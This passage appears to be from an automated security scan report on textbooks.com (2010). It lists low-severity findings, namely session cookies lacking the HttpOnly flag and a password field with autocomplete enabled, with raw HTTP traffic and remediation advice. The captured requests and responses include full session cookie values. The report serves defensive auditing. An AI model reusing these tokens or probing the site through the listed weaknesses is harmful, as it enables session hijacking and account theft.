Dq0sfn%2BxvMZVWAfF1gee3wmf2nKxU87adO9iljyBUVtjb1%2BYSuwnjro4eSz0oeR4WFBqfyp%2BeHZmSIavq3Y00rvB6zoqcbqZ4i4eoe1gJc3vVBuz9n5gP4BMqLMl%2FEbWIywFxbZFNv1M8OlyfFZBbl9kpUzfdnC1HrJFyHp%2BM%2B9LbayuCXGHH4s8wF4ancGqr2XUICaF9IngzURcvFPuEULoLBBd4H%2FCqrbpoJdoSs5%2Fbn6H2UYrgjEbyataNxKwmptLaIAGUWe6CNKE68aVDc8TV88fKIkK0LJm8vRfrr4clbcysIn4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=skRZMuAwUsugbpdzDo0%3D; expires=Mon, 26-Dec-2011 13:51:58 GMT; path=/; domain=.textbooks.com
Content-Length: 36639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.27. https://www.textbooks.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=ZX8GKynTOuWErN2bcxdglGgKUSVXmfokmfizdb6fXTI%2BkR6D8IpmlJEj8xLbFZnS%2BJJGCtOuN%2FOKVTrOLZcOjsEyXvfO3m%2FWjiS3Tov2DxWx9fYSBrvdGp1zFD%2BnDX4xGxk1gggjoyAKhSzCtlGPUE6nWxB1csyqQN49pxfSslBvn6mLxmBpHtLY2qr5rtRu9tnlKVxOXq7%2FlHpIlh5xb4ra9riQLAee%2FazWSBVImIIDygqP7JOCyi6pFbzhv9vg%2FS0Sg3qb1xgVTopYw%2BaVBJ22tR1fBdfZmD7U44lVQInfrgOocBPveCj%2B7GY2C0J8oh%2BZVK9Xt1%2FzOM0DBLjPABq1sI%2BiMRhJJrfgsS3iPVywEwpg%2F78enCbB2lHrUmr%2F7Lw3c5pV7kLIP%2FEEHyAbsSI9qhrUO1aAYrSPF7TcIiKJy0v1aMpBnUxS6NEF1Jdlpe8SXxtioOeQSmm1MeCzJnTK%2BQgoHNyZe4GIRgmzWKiWy4JjMdtuR1KYjgTFXn4l0nrhzC0HPucbs8NP%2FksPlrq%2BEC%2BNotrXpkmBW8G9fryo6eUnfBOJFg6vKHxLPbPuJBECFWXyOdR%2BqXpZdJazoXunYU1UxyscQzPrneA5uvC%2FxLBEn2QwJJGlXdmVR1Q5cA7tNdCc%2Bcu1Me0cycGyudiSiiyCJEwVsXhU3jxSS7r%2B6zpbwHKFwdEUEZcoNJvwZuinnH020ZwqBqODaagXOsOoW9JBCcUrqSx7ZiFrd7O8xoDt7aBSXwyk7AcvSw%2BEZUJN3Vku51lf2Pv%2Fa7MKxWN4sYPWZbBw5KF4soeZ0%2Fvnq2lMMJYoGjUjvd%2BaDZeJSpTafw3qbOe%2FvQiTCkxkEySfXUllj8UI2b82MFZBC6nPV3te%2BOzRsT7D3bgZ3JULOFVZnYK3NNfmkQvW7w7PWd%2FcaqffTehBhIMhdPQcED7H7X5RO7M84QxIn0rnhyNsDWFMmJ1433jiBv4H71uqgQfEBtmMqu9dMOyXG4SkVJoia5HgtyWaejvNKkYBhsqc0DnJ0XPJ8GvSlToFgL3O2iMRulEwx%2FxUuCi0oX0gyMm%2FdUj4ASoSPZcLR7MGHdnmpCHYuxrIEcxmin75yo13LkVZCbZyNWHUWG6NBN15WVJgJ3COQlGxX8lBuInrftfMkqy4tGZ%2BHBZRrFGTm8ULKVJXPjqLOCqcc1gk3hk1KgDCsZEe4XIyBnLVY6zU62RlabQRw8iypVhzrzZDdHBPOTcaAuNXPPnO3Zj13u7ZCzzXPk1ipoRZtpBeOPU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=b%2Bc21UkT1sQaFcBDQHk%3D; expires=Mon, 26-Dec-2011 13:51:33 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.28. https://www.textbooks.com/account.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:27 GMT
Set-Cookie: TBSESSION=HcVwmiPPLgvSivqJfoVmbt5gEZEgOp9Y6lox26AAXxDEjyif4Rkxly04sOZvg82jolcnT4y6M%2BzialsUEUiwtzC0zrDbjKsCRQsp6nd0%2BYtymVfLwc1Yl1g5o907kAXdJIgxb0amVLjTSzKlHgNQRwbvpNwW76WEWfJgBamgPBB1CyWrWBKzeeKIhhY343NcQGrHiNaXnjrKVHVu%2Bo1FGhpfdJaYnCAfOIJQWUtjeAhtQIj4quQwNpSvMYD1b8TmjOhnYOWRnvTXeqm5NHUK7qQq%2FjkS5iz60x3gyYSEBVIhshq7j7g4YM0YXpFUYZDYHOEpSIGyenfLHHsn02GIkFloCqa4AuzSEi8ZsCHgjI8mVN45YshZiUjIF7tAwShLwqZZ10UTxjftbLiTqUtgMOcN67A07SzT%2Bm0CKRleBxf9wiQQ%2FvyPtCYTJvei%2B5mqLbm991T4AxxBpJaEI%2BUgDwazAslsjkY4JIUy7YLGVJwu%2FBujjdU%2FTicgb%2Ff1z50%2Bpdn%2BLvuTlVyZfbbcaO6yutU55v6C1IJgRNCR%2FPIT0AqXdLBtKmafMSR%2BWspB3f1XB%2BauptSiRiRi93k1tJ2TwXiBPYKI%2BRJiptUrodZoDdGPwSkW63j4HAsLMpEEwfVov%2FvhWHHnjXic9UZVVGm7ulnspI3MlyxiuyEkDmJ1H8fhwSKQmtApkbumDH3pkz2D7kQSsglPowig%2FdlGUHoKTCNU573VqDUMoTeMAR7XhCZ6v4S4ViJnwVtKsv38xYZRzTijBe7xXX%2F4N0dVw7HgjK2xAYd2fNmOqn%2BX8H9BXQATUukdlq35nT%2FxoAVQqKcq046rXaTIcEraJgyGeFWZjugdBW%2BRPcqdZCrFw04L6LLv6r9TYvHwV%2Fg%2BlPBxSUjhQ1Wxu89rfRkRYFK036RbCcN%2B%2BDhOv%2Bnrvq6Lj2%2F8kO1AuI%2BMXWikfGbD4%2B03CwVPLlEHLKQI4cXZ9slTe%2Fzqvbh9Gd1Qurod%2FlXpNHZbgZ2U%2BM0pEnAmLIL93PWUT4ArNJHraqKPWK31tkUf1%2FDNmOW8xoEmwRBTC5GWmn9uiQVx5CT4QM8ecUE8hSiWxuveHAUMCzEDL9S7n6OlrWM856CqXGQKpQfittBjcx4mixKTRRV4yO8aLteM3jw3BpT45djSHDbibcFUVoM8ZzdrStw9PbT2JLjG6PlxHnjuXl7mNADGH6oIrppH1mDuh%2Bi0xp0uRXcgEgYyUFcHHmQlYllBMMLpj7A0AzPTtuvk7mCLB3xCiydJVPQZPGk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=m2sT%2BeW4bxWwrRneS60%3D; expires=Mon, 26-Dec-2011 13:53:28 GMT; path=/; domain=.textbooks.com
Content-Length: 33655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.29. https://www.textbooks.com/checkout.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /checkout.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:30 GMT
Content-Length: 24992
Connection: close
Set-Cookie: TBSESSION=GN%2Bu2RH0zu72InyE7yjEtHseOWko2s6C3Nnu%2Bel02ruAFXvxPxqzfstCuA9ufemgaVoW15o7ehfaiR3lXYev5Hl28gWQjGdp4r62cntl8Ppe%2BQB%2B%2F0PnTWSxzxnfeNqCXausL%2FDZQfxUHbZa9YobNMc8nhhywgxyfre46xwN%2FdJR8Nt8THau6QM%2FBcr5%2F541p6%2BsumwfXZERaEEcWeO7wcXn17Rv8%2FpFFZGks%2BIFbkjavKs9dmHpL7BrI2pt6sPQHd6b%2F2deduiP0eCPe1QyoIAGILwFRS1VriIsFzQzNIade%2BzmnH7SXXYtPwyEg9JZ4dcMkuab51A0Rbyy9BeTp%2FoQEc1rmertrtbWBb43SpmFMl1pXIEcwpTMwaOPsLcgAzKdCVWtHQM2y74Ilusj5dymYdWvCF0AFv72joZNh9xAOIj00moAbgiQvYm3YjgRybXPW9WGZyM%2BgfKSvc5swAJwYxW37jqjz99uCNVTm3zBmW39bUFF2gxAf3vZvMdxtqk5ozLzxiVXd0bxt4anKXczZx9bhqV9FBaehw5XylsCdUi3r%2Bvq1zaC5pHseIvr9%2BPEglegFQ%2B%2FcB%2Fdj5fO8ARg4iNt6%2FaYMgig5ah41Qu95hVCN7SsCNUFXdOlTgBfeobXgKKT0iSxNsimPxBfoTfpzMy%2Fby4BPcBbdT%2FfI1N3RhYOJLeAdCeujM8Zf2kK%2BQt5gzaEz7H0ARx%2FooJKRBqTMkKWw1Bbiu2usiUDsWDbH7mBiYYr5JoOUqU%2BgmlbkpdpH3IwQHihGE41zVNOEH44siHFWYUggG3CvTI3fDrDddZZgwv%2BaAdExM3QJScmaz2VVVGi7%2FXqU9OnyHVOusBLag9o5vRGT8SpjfoBv00CAehyb%2FnlDPlfmTR2ub2vbwjSxDFRz60oue41qDXfDZGyy8izPa293C2Uw98B2R7%2BxtYJBj895DBpW16w4bActPCnt2Fsxga7UPsKbwH5T5WruVPnmFOBV5GdnvIYNip%2Bt7kJhz1cg1pPGwRsVDHx5f4MMG70GQNe2HZGXDcb%2BPjlKHpSRYceIYzY1DbVka1dTaJ5HB7biPNlqni%2FRLgbvpxRYK4c4cUuwZw90NqaYAYBCZ2hXQBVYl%2FCi4xZnnjYBdK06nekOvzbvYBHOYXbbtnd4A1P0kMPaIJJEhLoeQBCR%2Bzb0%2Bs1d2Amp0nBVVDBvJEwSH6AeHJ2wNFvE%2BK9jjxqBBs0wqkLl%2F0OccXwsuWFBpSUUPPdJ4qm4Y8r%2FMp7FUkd6mjJblkV4kY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=9vc8KFkiyfVkIilGB6Y%3D; expires=Mon, 26-Dec-2011 13:53:30 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="ke
...[SNIP]...

5. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /account.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2